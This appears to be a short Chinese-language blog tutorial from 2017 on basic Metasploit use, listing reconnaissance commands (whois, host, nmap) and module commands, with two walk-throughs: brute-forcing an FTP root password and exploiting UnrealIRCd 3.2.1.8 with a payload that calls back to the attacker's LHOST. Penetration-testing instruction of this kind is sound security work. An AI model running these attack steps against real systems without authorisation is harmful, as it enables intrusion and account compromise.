Metasploit basic Tools and Exploits

ZMarvel

2017-11-18

安全工具

Metasploit, 原创

Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目，可以协助安全工程师进行渗透测试及入侵检测系统签名开发。 Metasploit项目最为知名的子项目是开源的Metasploit框架，一套针对远程主机进行开发和执行“exploit代码”的工具。
维基百科

service postgresql start

开启exploits数据库

msfconsole

运行Metasploit

whois

查看网站基本信息：whois www.okoksec.com

host

查看网站IP地址：host www.okoksec.com

nmap

扫描开放端口：nmap -F + IP

search

搜索需要查找的工具：search ssh_version

info

获取攻击模块信息：info + 模块名

use

使用模块：use + 模块名

show options

查看模块参数：

set

设置参数：set 参数　值

run

运行模块

back

退回msfconsole

案例：破解FTP密码

search ftp

use 模块

show options

set RHOST IP

set THREADS 30

set USERNAME root

set PASS_FIEL 路径

show options

exploit

案例2：Payloads and Backdoors

search Unreal 3.2.1.8

info 模块名

show options

set RHOST targetIP

show payloads

set payloads +

show options

payloads选项

set LHOST localIP

exploit

执行攻击脚本，enjoy ^-^